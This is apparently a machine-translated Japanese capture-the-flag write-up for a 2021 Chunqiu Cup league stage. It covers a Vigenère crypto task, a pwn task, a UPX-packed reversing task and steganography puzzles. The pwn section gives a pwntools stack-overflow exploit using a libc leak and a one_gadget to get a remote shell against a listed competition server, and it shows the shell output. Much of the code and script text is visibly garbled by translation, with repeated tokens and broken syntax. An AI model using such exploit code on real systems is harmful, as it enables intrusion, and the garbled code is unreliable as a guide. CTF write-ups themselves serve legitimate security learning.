タイトル：2021年春と秋のカップサイバーセキュリティリーグ秋のステージの書き込み

crypto

vigenere

https://www.boxentriq.com/code-braking/vigenere-cipher webサイトでのブラストは、key:asterismを取得します

ファルグを取得するための復号化。

または

Vigenereというタイトルによると、バージニアのパスワードであることがわかります

オンラインデコードツールでのクラッキング

https://guballa.de/vigenere-solver

フラグ：フラグ{53D613FC-6C5C-4DD6-B3CE-8BC867C6F648}

pwn

supercall

シンプルなスタックオーバーフロー、libcsearcherを使用して、質問からリークされた_io_2_1_stdin_の実際のアドレスを介してlibcベースアドレスを見つけ、one_gatgetを使用してシェルを取得します。

＃！/usr/bin/env python＃ - * - encoding: utf-8-* - '' '@file : exp.p.p.p.p.p.p.p.p.p.p.p.p.p.13:3933:07@著者: lexsd6' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' *local_mote=0elf='。/supercall'e=elf（elf）＃context.log_level=' debug'context.arch=e.archip_port=['123.57.207.81'、16985] debug=lambda : gdb.attach（p）if local_mote===1 3360 P=Process（ELF）else : p=remote（ip_port [0]、ip_port [-1]）＃0x000000000000026796 : pop rdi; retstack_addr=int（p.recvuntil（ '、'）[:-1]、16）stdin_addr=int（p.recv（）、16）log.info（hex（stack_addr））log.info（hex（stdin_addr））x=finder（ '_ io_2_2_1_stdin_' ' 9: Local-46E93283FF531:E02A73AE5B5BA375410855（ソースfrom:/mnt/d/filewsl/supercall/libc-2.27.so）p.sendline（ '1'*8+'2'*8+'3'*7）p.sendline（ '\ x00'*0x10+'x'*8+p64（x.gg（num=0）） execve（ '/bin/sh'、rsp+0x40、環境）制約: rsp0xf==0 rcx==null '' 'p.interactive（）

その後、遠隔猫の旗で。

[+] Gadget:0x4f3d5 [*]インラートモードへの切り替え$ lsbindevflagliblib32lib64supercall $ cat f*flag {2f3f3f3632-6484-4c00-82f3-a63e0d4340d9} $

resnake

質問にはUPXシェルがあることがわかりました。無セリングの後、私はそれをIDAで開いてレビューし、暗号化されたフラグ機能が疑われることがわかりました。

int sub_40186f（）{char v1 [256]; //[ESP+18H] [EBP-910H] char dst [2048]; //[ESP+118H] [EBP-810H] int j; //[ESP+918H] [EBP-10H] int i; //[esp+91ch] [ebp-ch] sub_4021ad（22、18）; scanf（ '％s'、v1）; for（i=0; v1 [i]; ++ i）; sub_4017d2（v1、i）; ＃fun2 memset（dst、0、0x800u）; sub_4015f7（v1、dst、i）; ＃fun1 sub_4021ad（22、20）; for（j=0; dst [j]; ++ j）{if（dst [j]！=a7g5d5baytmdlwl [j]）return puts（ '正しく〜もう一度来てください〜'）; } return puts（asc_405016）;}

fun2のフォローアップを続けてください。

int __cdecl sub_4017d2（int a1、int a2）{int result; //eax int j; //[esp+8h] [ebp-ch] int i; //[esp +ch] [ebp-8h] for（i=1; i=10; ++ i）{for（j=0; ++ j）{result=*（unsigned __int8 *）（j +a1）; if（！（_ byte）result）break; if（a2％i） *（_ byte *）（j + a1） ^=（_byte）i +（_byte）j; else *（_ byte *）（j + a1） ^=（unsigned __int8）（j％i） +（_byte）j; }} return result;}

入力文字列を使用することであり、各文字は位置に従って動作します。

Fun1は、文字列のbase64暗号化です。

while（v16 a3）{v3=v13; V14=V13 + 1; *（_ byte *）（a2 + v3）=str [（（signed int） *（unsigned __int8 *）（v16 + a1）2）0x3f]; v11=16 *（_ byte *）（v16 + a1）0x30; if（v16 + 1=a3）{v4=v14; V5=V14 + 1; *（_ byte *）（a2 + v4）=str [v11]; *（_ byte *）（v5 + a2）='='; V6=V5 + 1; V13=V5 + 2; *（_ byte *）（v6 + a2）='=';壊す; } v7=v14; V15=V14 + 1; *（_ byte *）（a2 + v7）=str [（（signed int） *（unsigned __int8 *）（v16 + 1 + a1）4）0xf | v11]; v12=4 * *（_ byte *）（v16 + 1 + a1）0x3c; if（v16 + 2=a3）{ *（_ byte *）（a2 + v15）=str [v12]; V8=V15 + 1; V13=V15 + 2; *（_ byte *）（v8 + a2）='=';壊す; } *（_ byte *）（a2 + v15）=str [（（signed int） *（unsigned __int8 *）（v16 + 2 + a1）6）3 | v12]; V9=V15 + 1; V13=V15 + 2; *（_ byte *）（a2 + v9）=str [ *（_ byte *）（v16 + 2 + a1）0x3f]; V16 +=3;}

ただし、デバッグ中に、FUN1の前に、関数がグローバル変数STR値を変更することがわかりました。

この関数は次のとおりです。

署名int sub_401536（）{char v0; //ST13_1署名int result; //EAX署名int v2; //[ESP+14H] [EBP-14H] int j; //[esp+18h] [ebp-10h] int i; //[esp+1ch] [ebp-ch] v2=strlen（ 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/'）; for（i=0; v2/2 i; ++ i）{for（j=0; v2 -i -1 j; ++ j）{if（str [j] str [j +1]）{v0=str [j]; str [j]=str [j + 1]; str [j + 1]=v0; }}} result=1; DWORD_406060=1; return result;}

だから私は自分の願いを満たすためにスクリプトを書きました：

base_flag=[]＃x='7G5D5BAY+TMDLWLU5CDKMTLCJNWKNUGB2AQL3CMPPVF6DAP72SCOSL b'x='abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/' v2=len（ 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789 + /'） '' ' v0=str [j]; str [j]=str [j + 1]; str [j + 1]=v0; }} '' '' for x: base_flag.append（ord（i））print（base_flag）for i in range（v2 //2）: in range（v2-i-1）: if base_flag [j] base_flag [j+1] 3360 v0=base_flag [j] base_flag [j] base_flag [j+1]=v0

本当のstrを入手してください：abcdefghijklmnopqrst0123456789+/uvwxyzabcdefghijklmnopqrstuvwxyz

fun1とfun2機能のソースをリバースコンピングする際に、フラグを取得します。

base64Table='abcdefghijklmnopqrst0123456789+/uvwxyzabcdefghijklmnopqrstuvwxyz'table2='abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/' tmp='7g5d5bay+tmdlwlu5cdkmtlcjnwknugb2akl3cpmppvftv'tlb '2coslb'tlb '2coslb'tlb '2coslb'tfmp2 '2coslb'tfmptv'tfmptv'tfmptv'tfmp2'slb'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'p In tmp:Index=table.index（i）tmp2 +=table2 [index] k=base64.b64decode（tmp2 +'=='）nre='' kk=[] for i in ren（len（k））: kk.append（kk [i]）print（kk）a2=len（kk）a2=len（kk）a2=len（kk）a2=len（kk）範囲（10））: i=i+1 for j in range（len（kk））: print（str（a2％i）+''+str（i））if a2％i！=0: kk [j]^=（i+j）els : kk [j]^=（j％i）+j）+j）プリント（kk） I in（kk）: flag+=chr（i）print（flag）exit flag

フラグ{5E2200BC-F21A-5421-A90B-57DEC19FE196}

Misc

質問

フォームに記入した後、フラグがあります

フラグ{世界に安全感をもたらしましょう}

helloshark

写真010それを開き、16進システムに多くのPK単語があることを発見しました。画像は分離されて処理されます（何よりも）。 Sure enough, the compressed package is hidden, but the compressed package sets a password, prompting the password in the picture guessing that the picture has LSB steganography, and use the tool zsteg for detection You can see that the password is @91902AF23C#276C2FC7EAC615739CC7C0 decompress the compressed package, and TCPフローを追跡するためにトラフィックパケットを開きます

フラグ Get Flag：Flag {a4e0a418-fced-4b2d-9d76-fdc9053d69a1} を写真パスワード9527 UNZIP、Open Excelファイルは6か月で構成されています。左側と底部は1です。6か月のデータを最初にまとめ、列の高さと列の幅 Add A ConditionAtを統合するQRコードです。文字列に1が含まれると、背景は黒で満たされます。 Wechatはスキャンできません。スクリーンショットQRコードDATAMATRIX QRコードオンラインデコードツールhttp://boy.co.ua/decode.php flag zfua {b3s1o9in1nw0halunofunc0hm1} caesarパスワード復号化のような旗のような文字列を取得するフラグ{h3y1u9ot1tc0ngratulati0ns1}

FROM：https://LEXSD6.GITHUB.IO/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AFE7%BD%91%E7%BBB%9C%E5%A E％89％E5％85％A8％E8％81％94％E8％B5％9B％E7％A7％8B％E5％AD％A3％E8％B5％9B％E5％8B％87％E8％80％85％E5％B1％B1％E5％B3％B0/＃CHRYPTO